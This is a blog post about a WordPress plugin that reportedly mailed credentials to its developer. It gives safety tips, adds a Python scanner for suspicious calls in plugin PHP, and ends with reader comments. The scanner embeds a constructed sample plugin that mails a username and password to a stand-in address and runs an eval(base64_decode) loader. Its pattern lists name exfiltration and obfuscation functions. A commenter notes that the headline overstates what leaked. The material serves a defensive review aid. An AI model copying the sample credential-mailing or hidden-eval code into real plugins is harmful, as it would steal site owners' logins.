
Malicious WordPress plugin steals your admin password, and you didn’t even know?

Now, how would you react knowing that the plugin you had used for ages emailed your admin login credentials to the plugin developer, and you didn’t even know?
Scary, isn’t it? Well, that’s just what happened to the blogger Sven.

Sven reports in his post that, while experimenting with a few plugins, he found that one plugin (Pushit) actually emailed his admin ID and password to an email address.
Now, this could have been an oversight or a mistake, but it’s a seriously scary thought.

What can you do to make sure that your WordPress plugins are “safe”?

Quite honestly, I don’t know of anything that will give us 100% security, but there are certain things you can do for sure.
1. Install and run plugins only from developers who have a good reputation.
2. Always test the plugin on a demo/test blog first.
3. Look for plugin reviews in the comments on the plugin page (usually the developer’s blog), or elsewhere on the web.
4. Never install plugins that have not been tested with your version of the blog software.
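Tip 2 (test on a throwaway blog) catches what a plugin does at runtime; a quick read of its PHP source before it ever goes near a real site catches the obvious cases, such as a plugin calling a mail or HTTP function right next to a password variable. The script below is an added example written for this post, not code from Sven, the Pushit plugin, or WordPress. It flags calls that send data off the server (`mail`, `wp_mail`, `wp_remote_post`, and so on) and calls commonly used to hide code (`eval`, `base64_decode`), and notes whether credential-looking identifiers appear near each call. The plugin source it scans is a constructed sample embedded in the script; the function names in that sample are invented. It is a review aid for a human reader, not a replacement for testing.

```python
"""Added example: first-pass review of a WordPress plugin's PHP source.

Lists calls that can send data off the server or hide what code does, and
whether credential-looking identifiers appear near each call. Constructed
for this post; the name lists are starting points, not a complete inventory.
"""
import re
from pathlib import Path

# Functions that can send data off the server (constructed list, not exhaustive).
OUTBOUND_CALLS = ("wp_remote_request", "wp_remote_post", "wp_remote_get",
                  "wp_mail", "mail", "curl_exec", "fsockopen", "file_get_contents")
# Functions commonly used to obscure what a plugin really runs.
OBFUSCATION_CALLS = ("base64_decode", "create_function", "gzinflate", "str_rot13", "eval")
# Identifiers that suggest credentials are being handled near a call.
CREDENTIAL_HINTS = ("pass", "pwd", "user_login", "auth_cookie", "secret")

# Longer names first so "wp_mail" is reported as wp_mail, not mail.
CALL_RE = re.compile(r"\b(" + "|".join(OUTBOUND_CALLS + OBFUSCATION_CALLS) + r")\s*\(")


def scan_php(source, filename="plugin.php"):
    """Return one finding per flagged call, in source order."""
    findings = []
    lines = source.splitlines()
    for lineno, line in enumerate(lines, 1):
        stripped = line.strip()
        if stripped.startswith(("//", "#", "/*", "*")):   # whole-line comments
            continue
        for match in CALL_RE.finditer(line):
            name = match.group(1)
            kind = "outbound" if name in OUTBOUND_CALLS else "obfuscation"
            # Look a few lines either side of the call for credential-like names.
            window = "\n".join(lines[max(0, lineno - 4):lineno + 3]).lower()
            findings.append({
                "file": filename, "line": lineno, "call": name, "kind": kind,
                "touches_credentials": any(h in window for h in CREDENTIAL_HINTS),
                "text": stripped,
            })
    return findings


def scan_plugin_dir(path):
    """Scan every .php file under a plugin directory (e.g. wp-content/plugins/foo)."""
    findings = []
    for php in sorted(Path(path).rglob("*.php")):
        findings.extend(scan_php(php.read_text(errors="replace"), str(php)))
    return findings


def high_priority(findings):
    """Findings worth reading first: outbound calls near credentials, and hidden code."""
    return [f for f in findings
            if f["kind"] == "obfuscation" or f["touches_credentials"]]


# Constructed sample plugin source (not a real plugin). The first function does
# what the post describes: it mails the login name and password to the developer.
SAMPLE_PLUGIN = r"""<?php
/*
Plugin Name: Constructed Sample (not a real plugin)
*/
function sample_notify_developer() {
    $user = wp_get_current_user();
    $pass = $_POST['pwd'];
    wp_mail('dev@example.invalid', 'New install', $user->user_login . ':' . $pass);
}
function sample_render_widget() {
    echo '<div>' . esc_html(get_option('sample_title')) . '</div>';
}
function sample_hidden($blob) {
    eval(base64_decode($blob));  // constructed: runs whatever $blob decodes to
}
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PLUGIN, "sample.php"):
        flag = "!!" if f in high_priority([f]) else "  "
        print(f"{flag} {f['file']}:{f['line']} {f['kind']:<11} {f['call']:<14} {f['text']}")
```

Run it as-is to see the report for the embedded sample, or call `scan_plugin_dir("wp-content/plugins/some-plugin")` on a downloaded plugin. Every legitimate contact-form plugin calls `wp_mail`, so a hit is a prompt to read that function, not a verdict; the `touches_credentials` flag and the obfuscation hits are what deserve attention first.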

WordPress plugins are great resources and probably one of the reasons millions of us, myself included, like the software so much. But blindly trusting all of them could also land us in trouble; just a word of caution to all.


Written by Mani Karthik

Blogger, Web / Social Media Enthusiast & SEO with Flip Media. I'm always on the learning curve. Love to meet new people, feel free to befriend me.


13 Responses

  1. Thank you very much for sharing such valuable information. Really, this post creates awareness for all WordPress developers.

  2. Is it impossible to see the code of WordPress plugins then?

  3. I have to disagree with #4 completely.

    I’ve installed WordPress 2.8 (not on my main site, I admit) and since a lot of plugin creators seem to have ignored the release of 2.8, I’ve had to test myself whether the plugins will work.

    DailySEOBlog seems to have ignored #4 itself.

    I can’t say positively, but I’m pretty sure that the “Notify me of follow-up comments via e-mail” is the Subscribe to Comments plugin. If you look at the Subscribe to Comments page (wordpress.org/extend/plugins/subscribe-to-comments) you will notice that it is listed as officially only “Compatible up to: 2.3.1”. That hasn’t stopped the thousands of people who download it weekly.

    • Mani Karthik

      I completely agree Yael. In fact, I hadn’t taken it seriously to this time. If the plugin works fine even after an upgrade, then I’d keep it. But I think this is a mistake I’ve been making and am seriously considering pulling them off with minimum user exp problems.

      • You are right, Mani. Sometimes plugins will work like upward-compatible versions. But the problem is that not all plugins work 100% compatibly with newer versions of WP.

        We can’t say that plugins will not work if they were developed for earlier versions of WP.

  4. I would have thought that WordPress’s approval process would be a little more careful about the kind of code placed in these plugins but I guess not.

  5. I think one should always use a plugin which is there in the WordPress directory.

    Don’t use plugins from the author’s site.

    What do you think?

  6. @Nihar: until Sven’s post, that particular plugin was in the WordPress directory.

    However, I think the title of this post is (unintentionally) misleading. If you read Sven’s post again, you’ll see that the plugin did not do anything with the WordPress admin password, only some basic SMS request data (that included the username and password for the SMS service, but nothing as sensitive as the WordPress admin password).

    Don’t get me wrong; it’s still a security issue. After all, the plugin was doing something without the user’s permission.

    But I’m pretty sure that your admin password is actually very safe, even from malicious plugin authors, because it is not stored clear text (even in the database). There’s no way that I know of for a plugin to ever access the unencrypted version of the password.

    All that said, it is definitely best to be cautious with any plugins. I think your tips are good ones. Perhaps some enterprising security pro will start a plugin-review blog and do us all a favor. :)

  7. It’s the best, but it’s also a naughty tool.

  8. Great one, and well done. Keep it up.
